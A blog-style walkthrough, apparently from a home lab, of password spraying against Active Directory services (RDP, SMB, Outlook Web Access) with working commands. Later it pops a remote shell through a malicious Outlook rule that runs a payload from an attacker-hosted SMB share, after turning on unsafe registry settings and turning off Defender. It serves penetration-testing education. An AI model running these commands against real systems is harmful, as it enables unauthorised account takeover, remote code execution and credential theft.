One form of brute forcing is called "Password Spraying". This form of attack is somewhat the inverse of the traditional form of brute forcing. Instead of using a few or even one username with a wordlist for potential passwords, password spraying makes use of a list of usernames with a few choice passwords.
For the following demos, the valid credentials found will be
thenoob:Winter2019. However, a list of accounts were added to my Active Directory lab environment (check out the Laboratorio de Computación post for my testing lab setup), and as such the username list (plus the added user: thenoob) was used in these attacks.
Also, some considerations when using any of these tools, dependent on the situation:
- if possible, verify the Account Lockout Policy for the given service/application
- throttle attacks to "blend in" with natural flow of network traffic
- are there password complexity requirements in place? 2FA/MFA implemented?
So let's get to it!!!
RDP → RDPassSpray
The RDPassSpray tool allows attackers to attempt to login using the Remote Desktop Protocol (RDP). When fed a username or list of usernames along with a password or list of passwords, this tool will attempt to login using xfreerdp.
python3 /opt/RDPassSpray/RDPassSpray.py -U users.txt -p Winter2019 -d noob.local -t 10.10.10.13
SMB → CrackMapExec
crackmapexec smb 10.10.10.13 -u ./users.txt -p Winter2019
OWA → MailSniper
One of the modules within the MailSniper tool allows attackers to password spray. This .ps1 script works in a similar fashion as to the other tools mentioned above, but attacks an Outlook Web Access page hosted by an Exchange server. The MailSniper Field Manual can be used to review the various MailSniper functions.
Invoke-PasswordSprayOWA -ExchHostname xchange -userlist .\users.txt -password Winter2019
OWA Round 2 → Atomizer
Another one of Byt3bl33d3r's tools, Atomizer of the Spraying Toolkit, can also attack OWA. The cool thing that drew my attention to this tool is the built in functionality to utilize Slack webhooks to notify of successfully found credentials. This capability helps build onto the Slack workspace that I've been building as seen back in two previous posts (Slacking off with sqlmap and Shout-out to the Slack Shellbot).
/opt/SprayingToolkit/atomizer.py owa xchange passwords.txt users.txt -i 0:45:00 --slack https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX
Note: in the above command, the
/etc/hosts file was edited to include the address of the Exchange server (reference this post for current lab configuration)
Once credentials are found and the
--slack argument is used, the app notifies the channel it is a part of.
Honorable Mention → Ruler
I found a few different posts (1, 2, and 3) that made me really want to try out Ruler in my lab. However, since the servers/apps were all updated, some of the awesome features of Ruler weren't effective anymore. I was able to password spray successfully with it.
But when attempting to create a malicious rule/form to get a reverse shell, or fire of an executable of my choosing, I finally figured out that Outlook stopped trusting "rule actions that can start applications/macros". (ref).
Side Quests to Achieve a Ruler Shell
So I really wanted to get Ruler to work in my lab and went down a quick little rabbit hole trying to figure out some of the needed configurations for it to work. For the system I was attacking I needed to make an edit to the Registry, as suggested in this post:
reg add "HKCU\Software\Microsoft\Office\16.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d "1" /f
As the entry name suggests, this allows for unsafe rules in Outlook.
Next, I needed to allow my target system to access the SMB share being hosted from my attacking machine. Normally when people post about transferring files between Kali and Windows, they reference the usage of Impacket's smbserver.py, with the command being something like this:
python /opt/impacket/examples/smbserver.py rulez /root/ruler-demo
However, with recent patches/updates, Windows no longer ships with SMBv1 enabled by default, so the
-smb2support flag may need to be used. Also with more patches/updates, Windows no longer enables "Guest access in SMB". This called for a quick edit to the Group Policy on target system to "Enable insecure guest logons":
So now the command should look like this:
python /opt/impacket/examples/smbserver.py rulez /root/ruler-demo -smb2support
Or alternatively, the Group Policy edit can be skipped if credentials are supplied to the command:
python /opt/impacket/examples/smbserver.py -username masternoob -password 'Passw0rd!' rulez /root/ruler-demo -smb2support
Note: since the command includes valid credentials for that user, when attempting to access the share, no password prompt will appear which was needed for the Ruler exploit to work
Back to the Main Quest: Ruler Shell
Now with the quick modifications to get setup in place, here's a quick demo of the sweet shell being popped using Ruler. A Covenant PowerShell grunt (ruler_grunt.bat) was staged in the
rulez share being hosted on my attacking system.
To kick off the rule and "popashell" I executed the following command:
/opt/ruler/ruler -k --url https://xchange/autodiscover/autodiscover.xml --domain noob --email email@example.com --username thenoob --password Winter2019 --verbose add --location "\\\\10.10.10.133\\rulez\\ruler_grunt.exe" --trigger "popashell" --name maliciousrule --send --subject popashell
Note: an updated Windows Defender should flag Covenant grunts as malware, so for this demo Defender was turned off; I do plan on looking at Donut hopefully in the near future to play around with obfuscating the grunts
I came back to edit this post to include this tool I came across. I'll admit it's not something that would fit in the category of "Password Spraying" but I think it'd be useful once valid admin credentials are found, possibly using one of the above mentioned methods. Spraykatz is described as:
"a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.
It simply tries to procdump machines and parse dumps remotely in order to avoid detections by antivirus softwares as much as possible."